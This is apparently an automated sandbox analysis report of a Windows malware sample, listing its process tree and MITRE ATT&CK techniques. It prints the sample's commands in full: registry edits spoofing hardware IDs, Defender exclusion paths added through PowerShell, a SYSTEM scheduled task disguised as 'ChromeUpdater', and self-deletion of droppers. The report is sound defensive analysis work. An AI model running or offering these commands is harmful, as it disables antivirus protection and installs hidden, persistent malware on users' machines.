    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\smchyip.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2020
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1468
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:320
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1724
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2284
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1660
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1912
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1900
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1824
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:988
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1700
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 4B9DFEFD1407B10C /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:328
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2860
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 9613114-8d2abece-A /f
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1708
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1896
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1676
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2900
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1972
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1496
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2044
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1796
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2168
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2232
      - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2400
- - C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
    "C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2944
- - C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
    "C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe" C:\Users\Admin\AppData\Local\Microsoft\tyiylPcxklhZAVjKpERcvWbMoQWacj.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
- - C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
    "C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\dkrhbdc.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:2780
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2720
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2644
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3008
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2264
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2216
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2736
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1572
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1612
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2868
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 89C9B7FCA98C0941 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2552
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2808
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 4841653-05866bce-A /f
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1616
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:3012
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1536
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1460
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:892
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:2816
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:964
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1664
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:772
    - - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"
        5⤵
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1484
      - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2020
- - C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
    "C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:408
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1608
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"
  2⤵
  PID:1576
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"
  2⤵
  PID:612
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:352
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2964
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:2204
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1068
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2224
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"
  2⤵
  PID:2052
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"
  2⤵
  PID:2376
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1032
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1808

C:\Windows\system32\taskeng.exe
taskeng.exe {F1BB6EF0-03E5-4C98-A873-19D458AD76E7} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:2380
- C:\Program Files\Google\Chrome\ChromeUpdater.exe
  "C:\Program Files\Google\Chrome\ChromeUpdater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2940
- C:\Program Files\Google\Chrome\ChromeUpdater.exe
  "C:\Program Files\Google\Chrome\ChromeUpdater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion